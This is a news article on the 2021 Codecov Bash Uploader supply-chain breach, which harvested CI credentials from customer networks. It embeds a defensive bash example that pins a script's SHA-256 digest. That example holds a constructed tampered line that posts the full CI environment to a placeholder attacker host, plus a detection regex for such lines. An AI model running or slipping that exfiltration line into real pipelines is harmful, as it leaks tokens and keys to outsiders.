Hackers attacked the Codecov supply chain and compromised hundreds of networks
As became known earlier this week, unknown attackers compromised Codecov, an online code coverage platform, and planted a credential collector in one of its tools.
The compromise affected the Bash Uploader, the script Codecov customers run to submit code coverage reports for analysis. The attacker gained access to the Bash Uploader script on January 31, 2021 and gradually modified it, adding malicious code that harvested any sensitive information passing through the CI environment in which the script ran, including credentials, tokens and keys.
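The pattern described above, a helper script fetched from a remote URL and executed in CI, is only as trustworthy as the copy served at that moment. The following bash snippet is an added example, not Codecov's code or anything the article's sources published: it pins the SHA-256 of a reviewed script version and refuses to execute a copy whose digest differs, and it includes a crude review aid that flags lines dumping the process environment into a network request. The two script texts, the `attacker.invalid` host and the function names are all constructed for this example.

```shell
#!/usr/bin/env bash
# Added example, not Codecov's code: pin the digest of a fetched CI helper
# script and refuse to execute it if the digest changes. The script texts,
# the "attacker.invalid" host and the function names are constructed here.
set -euo pipefail

# Constructed stand-in for the reviewed, known-good uploader script.
GOOD_SCRIPT='#!/bin/bash
echo "uploading coverage report"'

# Constructed stand-in for a tampered copy: same script plus one extra line
# that ships the whole CI environment, tokens included, to a remote host.
BAD_SCRIPT='#!/bin/bash
echo "uploading coverage report"
curl -s -d "$(env)" https://attacker.invalid/upload || true'

# sha256_of TEXT: hex SHA-256 of TEXT (coreutils sha256sum, or shasum on macOS).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    printf '%s' "$1" | sha256sum | cut -d' ' -f1
  else
    printf '%s' "$1" | shasum -a 256 | cut -d' ' -f1
  fi
}

# In a real pipeline this is a constant committed next to the CI config and
# updated only after reviewing the new script version. Here it is derived
# from the constructed good script so the example runs offline.
PINNED_SHA256=$(sha256_of "$GOOD_SCRIPT")

# verify_script TEXT EXPECTED: returns 0 if the digest matches the pin,
# 1 otherwise. Callers must only execute TEXT after a 0 return.
verify_script() {
  local script="$1" expected="$2" actual
  actual=$(sha256_of "$script")
  if [ "$actual" != "$expected" ]; then
    echo "refusing to run: sha256 $actual does not match pinned $expected" >&2
    return 1
  fi
  return 0
}

# find_env_exfil TEXT: review aid for the case where no pin exists yet.
# Prints (with line numbers) and returns 0 for lines that feed the process
# environment into a curl/wget call; returns 1 when nothing matches.
find_env_exfil() {
  printf '%s\n' "$1" | grep -nE '\$\(env\)|`env`|(^|[^a-zA-Z_])env[^a-zA-Z_].*(curl|wget)' \
    || return 1
}

# Demonstration: the pristine copy passes, the tampered copy is rejected and
# its exfiltration line is flagged.
if verify_script "$GOOD_SCRIPT" "$PINNED_SHA256"; then
  echo "good copy: digest matches the pin, safe to execute"
fi
if ! verify_script "$BAD_SCRIPT" "$PINNED_SHA256"; then
  echo "tampered copy rejected; suspicious lines:"
  find_env_exfil "$BAD_SCRIPT" || true
fi
```

In a CI job the same check is applied to a downloaded file rather than an inline string: fetch the script to disk, pass its contents to `verify_script` with the committed digest, and only then run it with `bash`. The pattern scan is deliberately a heuristic for code review, not a control; an attacker who knows the regex can trivially evade it, which is why the pinned digest is the check that actually matters.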
“The entry point for the attacker was an error made by the developers during the Docker Codecov image creation process, which allowed the attacker to extract the credentials needed to make changes to the Bash Uploader script,” Codecov representatives said.
The intrusion was discovered only on April 1, 2021, and the developers, together with third-party forensic experts, are investigating the incident. According to Reuters, investigators have since concluded that the incident affected hundreds of customer networks, making the attack far larger than originally thought.
The problem is that Codecov has over 29,000 customers, including well-known companies such as GoDaddy, Atlassian, The Washington Post and Procter & Gamble (P&G). According to US federal authorities, who are already investigating the incident, the attackers used the stolen customer credentials to access hundreds of networks.
“The hackers have made an extra effort to use Codecov to infiltrate the networks of other software vendors, as well as companies that provide their own technology services to others, including IBM,” an anonymous source close to the investigation told the publication.
Bleeping Computer writes that the list of companies and GitHub projects using Codecov is extensive: a simple search for the URL of the compromised Bash Uploader script reveals thousands of projects that have used or are still using it.
Although the exact scale of the incident is still unknown, representatives of Atlassian and Hewlett Packard Enterprise have already told reporters that they have carried out inspections and found no signs that their systems were compromised.
Let me remind you that we also wrote that North Korean hackers attacked cybersecurity experts on social networks, and that FireEye's CEO blamed Chinese hackers for indiscriminate cyberattacks on Microsoft Exchange.